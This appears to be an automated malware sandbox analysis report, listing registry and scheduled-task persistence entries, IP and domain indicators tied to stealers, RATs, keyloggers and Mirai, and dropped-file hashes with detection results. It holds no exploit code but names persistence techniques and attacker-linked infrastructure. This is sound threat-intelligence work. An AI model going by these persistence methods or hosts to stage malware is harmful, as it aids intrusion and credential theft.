19:15:31 | Task Scheduler | Run new task: WmiPrvSE path: "C:\agentwebreviewDhcp\WmiPrvSE.exe"
19:15:32 | Task Scheduler | Run new task: WmiPrvSEW path: "C:\agentwebreviewDhcp\WmiPrvSE.exe"
19:15:32 | Task Scheduler | Run new task: ybWXCCKXKhIvlNpBF path: "C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe"
19:15:32 | Task Scheduler | Run new task: ybWXCCKXKhIvlNpBFy path: "C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe"
19:15:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run System "C:\Program Files\Windows Mail\System.exe"
19:15:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ybWXCCKXKhIvlNpBF "C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe"
19:15:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\agentwebreviewDhcp\WmiPrvSE.exe"
19:16:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | 1.exe | malicious | Unknown | ip-api.com/json/?fields=hosting,query
208.95.112.1 | 1.exe | malicious | Unknown | ip-api.com/json/?fields=hosting,query
208.95.112.1 | YPzNsfg4nR.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | SAL987656700.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Resource.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | P3A946MOFP.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | BootstrapperV1.16.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | SharkHack.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | paint.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | X9g8L63QGs.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | 1.exe | malicious | Unknown | 208.95.112.1
ip-api.com | 1.exe | malicious | Unknown | 208.95.112.1
ip-api.com | YPzNsfg4nR.exe | malicious | XWorm | 208.95.112.1
ip-api.com | SAL987656700.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Resource.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | P3A946MOFP.exe | malicious | XWorm | 208.95.112.1
ip-api.com | BootstrapperV1.16.exe | malicious | XWorm | 208.95.112.1
ip-api.com | SharkHack.exe | malicious | XWorm | 208.95.112.1
ip-api.com | paint.exe | malicious | Blank Grabber | 208.95.112.1
ip-api.com | X9g8L63QGs.exe | malicious | Blank Grabber | 208.95.112.1
api.telegram.org | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Resource.exe | malicious | Blank Grabber | 149.154.167.220
api.telegram.org | user.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | UpdaterTool.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | document pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | kP8EgMorTr.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc | 149.154.167.220
TELEGRAMRU | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | http://t.me/hhackplus | malicious | Unknown | 149.154.167.99
TELEGRAMRU | Resource.exe | malicious | Blank Grabber | 149.154.167.220
TELEGRAMRU | user.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | UpdaterTool.exe | malicious | Unknown | 149.154.167.220
TELEGRAMRU | document pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | yxU3AgeVTi.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | ITT # KRPBV2663 .doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TUT-ASUS | 1.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | 1.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | YPzNsfg4nR.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | SAL987656700.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Resource.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | P3A946MOFP.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | BootstrapperV1.16.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | SharkHack.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | paint.exe | malicious | Blank Grabber | 208.95.112.1
TUT-ASUS | X9g8L63QGs.exe | malicious | Blank Grabber | 208.95.112.1
UNITLINE_RST_NET1RostovnaDonuRU | http://winningwriters.com | malicious | Unknown | 94.141.120.12
UNITLINE_RST_NET1RostovnaDonuRU | RFQ_BDS636011.exe | malicious | FormBook, GuLoader | 94.141.120.137
UNITLINE_RST_NET1RostovnaDonuRU | Quotation.exe | malicious | FormBook, GuLoader | 94.141.120.137
UNITLINE_RST_NET1RostovnaDonuRU | QUOTATION#09678.exe | malicious | RedLine | 94.141.120.6
UNITLINE_RST_NET1RostovnaDonuRU | hidakibest.ppc.elf | malicious | Gafgyt, Mirai | 94.141.123.127
UNITLINE_RST_NET1RostovnaDonuRU | hidakibest.mips.elf | malicious | Gafgyt, Mirai | 94.141.123.127
UNITLINE_RST_NET1RostovnaDonuRU | hidakibest.x86.elf | malicious | Mirai, Gafgyt | 94.141.123.127
UNITLINE_RST_NET1RostovnaDonuRU | hidakibest.arm7.elf | malicious | Gafgyt, Mirai | 94.141.123.127
UNITLINE_RST_NET1RostovnaDonuRU | hidakibest.arm4.elf | malicious | Gafgyt, Mirai | 94.141.123.127
UNITLINE_RST_NET1RostovnaDonuRU | hidakibest.arm6.elf | malicious | Gafgyt, Mirai | 94.141.123.127
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | UXxZ4m65ro.exe | malicious | Quasar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Customer.exe | malicious | XWorm | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Solara Bootstrapper.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Solara.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | vRecording__0023secs__Stgusa.html | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | U1P3u1tkB2.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | U1P3u1tkB2.exe | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 9876567899.bat.exe | malicious | Lokibot | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D | malicious | Unknown | 149.154.167.220
                                                                                            No context
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1168
                                                                                            Entropy (8bit):4.448520842480604
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                            MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                            SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                            SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                            SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.898959662545016
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6Xam1t9xZ8RxeOAkFJOcV4MKe28dgdTRpvqBH/uulB+hnqXSfbNtm:g6xvxVx9gpvkRTkZzNt
                                                                                            MD5:8479DC9042AC92C741E937B954C39DB8
                                                                                            SHA1:3AC8B538358E5B85A042F1D548497C3357987BA8
                                                                                            SHA-256:133D9178DCEB7363A949EC3B1D48EDBA155330A4CFBFEB1F369D5A4E32085C15
                                                                                            SHA-512:79AB3B71062AD2DD01B223E8A20B155BD21470A2CA9B5B5D2F776C8989C5A09E6D75276CC24C95F851B3D0736D202BFC3C2CEDEEF2374DC068B8DB6ABE33A1BB
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (311), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):311
                                                                                            Entropy (8bit):5.810891077704598
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:RTBDrfNpa60nRfdVMTwU0HRT+TGfyzf8TimK1/iHVOypSosKJ:bn0n5XMTgHRZfyL82mMk/sm
                                                                                            MD5:84D06289D8633C27E7EC8250D8273993
                                                                                            SHA1:C9481FFF5EDC3A876B22A67C17FAAB48042344FC
                                                                                            SHA-256:73C94FDDC2429985110949181560E27F1FACCF20C2209699A3E0CE1ECA14058F
                                                                                            SHA-512:D03EEB2350DD2827776C1C8CE8BA9BEE451C76869A921A80B7D7ABED405EF367C2443277AE93FFEE5C28993EBA3F08009FD5DCE2173382E8A479A42CD32E4BCE
                                                                                            Malicious:false
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (421), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):421
                                                                                            Entropy (8bit):5.830239921347405
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:iP2OlhmoycGhZ+qB7BXvwwVVWWMCSYh8ITVptJpLZJH1z7lghrlbAb15EuQRdlpw:GphmDiOdcWMCSs/TpVPzAlcbDEnPk8yv
                                                                                            MD5:6918914B8918718B6932311F965BDB39
                                                                                            SHA1:0EF92513A9E33A70305832381E215015C4624B22
                                                                                            SHA-256:1CB91C97E34144BFB8B46A7BC66EE911AA070A3ACEAF2DBCDFDC2515C33E4E4B
                                                                                            SHA-512:75E14AE9284948AAF6B1A65C70FF9BE67873545BDD36E8FBDC18B7A6E9ACD462C9CAF432A9157CB3E3A05C1B33570E8F941DECFC1BC6C46112E3C3420E8FD6C3
                                                                                            Malicious:false
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7067091120954553
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqO:2JIB/wUKUKQncEmYRTwh0C
                                                                                            MD5:BC824BD115371A3E3DABB44127E47CD1
                                                                                            SHA1:71658438C32C367DF57CFFCF05021071B84807B8
                                                                                            SHA-256:8B9B12B293E2ED544537D8076903DFF4E2C2F328FFFF77BBCCC955451CFFC857
                                                                                            SHA-512:8E613B53D2B60B8AE3C12A6A67CC4AF9A4176239D2FFBA0AA8B1546B8D2227339D7B1B6A94F2B6C7E7D71934E66491DFFCC5988C06EF37BDA0DBAC2F33B30DD2
                                                                                            Malicious:false
                                                                                            Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb90ac45a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7900113077022748
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:jSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:jazaPvgurTd42UgSii
                                                                                            MD5:A850B6BED786E15E32AB263406F9C027
                                                                                            SHA1:274301E5F98FC3BE9E641FC7487AB335B247AD15
                                                                                            SHA-256:4845B42C3BB61FE95A702981DB2AA7C92A41EACB5B23E862F32BD92DC772EF1F
                                                                                            SHA-512:291EE24696160A3A79D6B8D0D43DFEE762A1693CB1BAE80551E26393B1BF64051F346B997346F323BB9100AB51C74AC3DFA8D5F3BF4BB2DEBDD0DFE2D5558178
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.0821302702335392
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:sEYeleR6XzNt/57Dek3JGjigllillEqW3l/TjzzQ/t:LzleRuPR3tGzGmd8/
                                                                                            MD5:13294CB77981B0A39F47F74E475F4291
                                                                                            SHA1:9F0B0C15D633F2C4B8F7C33934926EC878CD4BB1
                                                                                            SHA-256:26BE3705C8C83355D3136AD7378956402F9FFAE22A2FF617DE9FAB9FCBA6DB46
                                                                                            SHA-512:47DDFB7CA0ED722A9B30F87034493CA132039E3264F55123DF6D5B041604B6AB0BD7011FF5CA728C785A9826CE69D239961AE436031EE9BCDB6243B77786036F
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Windows Mail\System.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):847
                                                                                            Entropy (8bit):5.354334472896228
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                            Process:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):654
                                                                                            Entropy (8bit):5.380476433908377
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\cnvwov.EXE
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1915
                                                                                            Entropy (8bit):5.363869398054153
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4vb
                                                                                            MD5:63FDE44070DCD58C798C851711274955
                                                                                            SHA1:70F292AEC1D905E7B3875B457EFB6AB59666A9EE
                                                                                            SHA-256:11FE986688725A8BDA34D763C6BE6DBF4957CA1710603D111FBDFE7D7CB10DEE
                                                                                            SHA-512:E9DCC7BDB7895982206E6E3733D13B99E6B66F148AE44AF268AEF16BDBC752E05FDFD01F489EC7419403BB985E66A55A14A34523AE8DCE8B1077432524941DA5
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:modified
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................
                                                                                            Process:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):76
                                                                                            Entropy (8bit):3.7199485344067496
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:rRSFYJKXzovNsr4rNrNryyAFYJKXzovNsra:EFYJKDoWrcBByyAFYJKDoWra
                                                                                            MD5:70332B4E3ED0908C15D7B8EB12ADE297
                                                                                            SHA1:903EE760E5D1608DEC1B603F2F0376F409767017
                                                                                            SHA-256:7712EAABCF53012ED8D8DBC2B4FF3BEB0470C4BB8A21482D1387A9534EFB9ECE
                                                                                            SHA-512:7A51460588DA9E20769DB5923D84ACE945BF848CB2C8662F2B1641C3ACD8070017142D3DB3CFDC32F4C2C81FB19659D91DD2C7483BB903B8395964205C759274
                                                                                            Malicious:false
                                                                                            Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r[WIN]r....### explorer ###..[WIN]r
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Tue Jan 7 19:26:53 2025, 1st section name ".debug$S"
                                                                                            Category:modified
                                                                                            Size (bytes):1928
                                                                                            Entropy (8bit):4.6285260162710795
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:9UaLz7iVZ5KTcslmuulB+hnqXSfbNtmh7:9jnulKTcs2TkZzNty7
                                                                                            MD5:C4EF65907F7785631BA90E9C49860466
                                                                                            SHA1:5F5824D6BFDE99B9CB135FE5B70CAF2D3C20A934
                                                                                            SHA-256:A18DD44441E8E8F9C74D397E05625273DE7CF4A0CAA2963DC7CC2D6074155E22
